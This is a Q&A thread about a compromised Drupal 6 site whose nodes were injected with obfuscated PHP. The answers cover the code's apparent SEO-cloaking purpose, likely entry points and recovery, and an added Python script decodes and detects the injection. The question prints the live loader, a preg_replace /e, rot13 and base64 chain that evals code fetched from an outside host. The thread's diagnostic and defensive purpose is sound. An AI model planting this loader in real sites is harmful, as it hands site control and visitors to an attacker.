SQL PHP injection attack in Drupal 6
Today, all the nodes in my drupal 6 site appeared with this added php script
?php $node->nid = 849;
preg_replace('/^(.'.'*'.')$/'.'e', preg_replace('/^(.'.'*'.')$/'.'e', 'str'.'_'.'rot'.(27-14).'(\'\1\')', 'riny(onfr'.(12*3+4*7).'_qrpbqr(\\'.(2/2).'))'), 'aWYoIWZ1bmN0aW9uX2V4aXN0cygnbm9kZV91cGRhdGVfbG9nJykpQGV2YWwoQGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwOi8vc3NlZHJ1cC5vcmcvYXQvcl9pbmMucGhwJykpOwppZihmdW5jdGlvbl9leGlzdHMoJ25vZGVfdXBkYXRlX2xvZycpKW5vZGVfdXBkYXRlX2xvZygkbm9kZSk7');
if(@$node->body):
?php echo @$node->title;?
?php echo @$node->body;?
?php else:?
... here would go the original text of the node
?php endif;?
(I've removed some symbols to make sure you can correctly read the php code)
So, I guess this means that somebody was able to update the information in the drupal tables and inject this php script.
1 - What is this PHP code doing (if anything)? (of course apart from preventing the visualization of the node content)
2 - Any idea of how did they manage to do this? Is a Drupal security leak? a Mysql one?
3 - I guess the only way to reinstate this is by completely restoring the database...
The guy that made this has really tried to make the code hard to read.
I'm not 100% sure how exactly this works, but the end result of the top line is something like this:
Whoever made this targeted your site because it's a Drupal site. Are you running an up-to-date version? They could be exploiting a known security hole in Drupal / a contributed Drupal module. Are you using PHP filters in your Drupal nodes? This could be the access point.
I took a look at the code linked to, which was made hard to read as well. That is the code that is responsible for updating all of your nodes. It seems like the goal was to show special content for the search engine crawlers by looking at the IP address. That is an SEO strategy known as cloaking.
Anyways the link to the actual code that is run:
In short, this attack on your site was meant to hide the fact that the search engine would index some special contents on your site. This is probably made to boost SEO for some site. The one who made this really knows what he wanted to do and how to do it.
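As an added example (not code from the question or from the answer above), the following Python replays the two decoding steps this answer describes, str_rot13 and then base64_decode, without executing anything, and checks a node body for the markers of this injection. The base64 payload and the host inside it are constructed placeholders, not the blob from the question.

```python
# Static triage of the obfuscated preg_replace()/e snippet from the question.
# Nothing here runs PHP: it replays the string transformations the injected code
# performs (str_rot13, then base64_decode) and flags node bodies with the same markers.
import base64
import codecs
import re

# The attacker hid literals behind arithmetic: 27-14 -> 13, 12*3+4*7 -> 64, 2/2 -> 1.
ROT13_TEMPLATE = "riny(onfr" + str(12 * 3 + 4 * 7) + "_qrpbqr(\\" + str(2 // 2) + "))"

# Constructed stand-in for the base64 blob on the page; the host is a placeholder.
CONSTRUCTED_PAYLOAD = ("if(!function_exists('node_update_log'))"
                       "@eval(@file_get_contents('http://placeholder.invalid/r_inc.php'));")
SAMPLE_B64 = base64.b64encode(CONSTRUCTED_PAYLOAD.encode()).decode()

# Constructed node body: the first lines from the question, PHP open tag restored.
SAMPLE_BODY = (
    "<?php $node->nid = 849;\n"
    r"preg_replace('/^(.'.'*'.')$/'.'e', preg_replace('/^(.'.'*'.')$/'.'e', "
    r"'str'.'_'.'rot'.(27-14).'(\'\1\')', 'riny(onfr'.(12*3+4*7).'_qrpbqr(\\'.(2/2).'))'), "
    "'" + SAMPLE_B64 + "');\nif(@$node->body): ?>\n"
)

# Markers of this injection: one hit deserves a look, all four is the pattern above.
INDICATORS = {
    "preg_replace_e": re.compile(r"preg_replace\([^,]*\.\s*'e'\s*,"),
    "str_rot13_split": re.compile(r"'str'\s*\.\s*'_'\s*\.\s*'rot'"),
    "long_base64": re.compile(r"'[A-Za-z0-9+/=]{80,}'"),
    "hidden_nid": re.compile(r"\$node->nid\s*=\s*\d+;"),
}

def reveal_inner_call(template=ROT13_TEMPLATE):
    """Apply the str_rot13 that the inner preg_replace()/e performs on its replacement."""
    return codecs.decode(template, "rot_13")

def decode_payload(b64):
    """Apply the base64_decode whose output the outer stage would hand to eval()."""
    return base64.b64decode(b64).decode("utf-8", errors="replace")

def scan_body(body):
    """Return the names of the indicators present in one node body."""
    return [name for name, rx in INDICATORS.items() if rx.search(body)]

if __name__ == "__main__":
    print("inner stage becomes:", reveal_inner_call())
    print("decoded payload:", decode_payload(SAMPLE_B64))
    print("indicators found:", scan_body(SAMPLE_BODY))
```

Run scan_body over each body pulled from the Drupal 6 node_revisions table to list the nodes that carry the same markers before restoring from backup.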
I assume you've got an up-to-date installation of Drupal and all the modules you're using. That's the biggest thing you need to be sure of -- keep an eye on Drupal versions and always upgrade when a security update is released.
However, it's far more likely to be one of your modules that has a security flaw rather than the Drupal core. There have been (and likely still are) flaws in Drupal itself, but the really nasty issues have tended to be in modules.
The reason for this is that modules tend to be written by third-parties, who may or may not have a good understanding of good security practice. And whereas the core is used by everyone and gets a lot of developer attention, most modules won't have such broad usage, so they get less development work, less testing and less usage, so bugs are less likely to be spotted.
Have a look at the non-core modules you've used for your site (it might help to edit your question to list them here, on the off chance someone knows something specific).
Use Google to search for
drupal modulename security
or something similar, and see what turns up. Also visit their pages on drupal.org and read the notes there; see how active the project is - when was the module last updated? and how often? how many developers have worked on it? etc - if those figures are low, consider finding an alternative module to do the same job. If your PHP skills are good enough (and you have the time), you could do a code review of them to see if you can spot anything.
Of course, it may not be a drupal issue at all. If you're on a shared hosting platform, the box could have been compromised by a security issue on any one of the hosted sites, resulting in all sites on the box being compromised (this happened to me once - not good). But since the code that was injected is drupal-specific, it would seem that it's likely to be a drupal hack, so the main suspect must remain your installation.
Hope that helps.
You may have your "input formats" set wrong. Note that the "default" format is the one accessible by everyone. If you set "FULL HTML" as "default", you open up your site to many XSS exploits.
If you set it to "PHP" you open it up to about everyone.
"Default" does not mean that it only becomes the default format, i.e. the one selected already. It implies that everyone, including all those who can comment and post nodes, can insert any kind of PHP.
In addition to the advice mentioned, you should audit your permissions. It is possible that the hacker found a way in that didn't exploit a security hole (XML-RPC, PHP filter on for non-admins, etc).
Looking through server logs, potentially limiting to POSTs, may provide some information on how it happened.
It is also possible that the hacker directly accessed the database server and bypassed Drupal itself.
Do not forget to check your permissions. Sometimes a developer forgets to prevent editing from anonymous users and it can take a while until you find about it.